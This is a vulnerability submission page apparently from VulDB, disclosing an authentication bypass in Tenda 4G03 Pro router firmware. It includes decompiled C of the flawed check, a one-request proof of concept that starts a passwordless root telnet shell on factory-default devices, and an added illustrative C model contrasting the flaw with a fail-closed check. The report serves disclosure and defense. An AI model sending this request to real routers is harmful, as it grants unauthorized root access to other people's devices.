| Title | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 Authentication Bypass Issues |
|---|
| Description | Tenda 4G03 Pro V1.0 /bin/httpd authentication bypass for sensitive endpoints

The R7WebsSecurityHandler function (FUN_00021a54) in /usr/sbin/httpd of Tenda 4G03 Pro V1.0 firmware V04.03.01.53 explicitly skips authentication for three sensitive management endpoints when the admin password is unset (factory default). Sending GET /goform/telnet starts a persistent root telnet daemon on TCP/23. The /goform/ate endpoint enables OS command injection. The /goform/zerotier endpoint exposes VPN tunnel configuration. All three are accessible with zero credentials on a factory-default device.

POC:

Auth bypass code (FUN_00021a54):

```c
if (strncmp(url,"/goform/telnet",0xe)==0 &&
    DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/ate",0xb)==0 &&
    DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/zerotier",0x10)==0 &&
    DAT_00050f14=='\0') goto pass_through;
```

PoC — spawn root telnet shell:

```
GET /goform/telnet HTTP/1.1
Host: 192.168.0.1
```

Result: telnetd starts on TCP/23, login as root with no password |
|---|
| User | CoreNode (UID 96566) |
|---|
| Submission | 2026-03-18 03:16 (19 days ago) |
|---|
| Moderation | 2026-04-04 08:20 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 355279 [Tenda 4G03 Pro up to 1.0/1.1/04.03.01.53/192.168.0.1 /bin/httpd privilege escalation] |
|---|
| Points | 17 |
|---|
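
A small C model of the check described in the submission, beside a fail-closed variant, added here as an example; it is not code from the submission or from the firmware. The names `decision_t`, `reported_decision` and `hardened_decision`, and the session fallback for all other cases, are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

typedef enum { PASS_THROUGH, NEEDS_SESSION, REFUSED } decision_t;

/* The three endpoints named in the report. */
static const char *const SENSITIVE[] = {
    "/goform/telnet", "/goform/ate", "/goform/zerotier",
};
#define N_SENSITIVE (sizeof SENSITIVE / sizeof SENSITIVE[0])

/* Prefix match, as the strncmp() calls in the report do, so the hardened
 * policy covers every URL the reported exemption covered. */
static bool is_sensitive(const char *url)
{
    for (size_t i = 0; i < N_SENSITIVE; i++)
        if (strncmp(url, SENSITIVE[i], strlen(SENSITIVE[i])) == 0)
            return true;
    return false;
}

/* Reported behaviour: password_set == false models DAT_00050f14 == '\0'.
 * The session fallback is an assumption; the report does not show it. */
decision_t reported_decision(const char *url, bool password_set, bool has_session)
{
    if (is_sensitive(url) && !password_set)
        return PASS_THROUGH;                 /* goto pass_through */
    return has_session ? PASS_THROUGH : NEEDS_SESSION;
}

/* Fail closed: until a password exists, the sensitive endpoints are refused. */
decision_t hardened_decision(const char *url, bool password_set, bool has_session)
{
    if (is_sensitive(url) && !password_set)
        return REFUSED;
    return has_session ? PASS_THROUGH : NEEDS_SESSION;
}

int main(void)
{
    static const char *const name[] = { "pass", "login", "refuse" };
    for (size_t i = 0; i < N_SENSITIVE; i++)
        printf("%-18s factory-default: reported=%s hardened=%s\n", SENSITIVE[i],
               name[reported_decision(SENSITIVE[i], false, false)],
               name[hardened_decision(SENSITIVE[i], false, false)]);
    return 0;
}
```
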